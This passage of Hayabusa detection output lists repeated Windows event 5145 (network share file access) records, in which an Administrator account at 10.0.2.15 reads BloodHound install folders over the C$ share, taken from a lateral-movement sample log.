Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ 
: Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 : 
IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
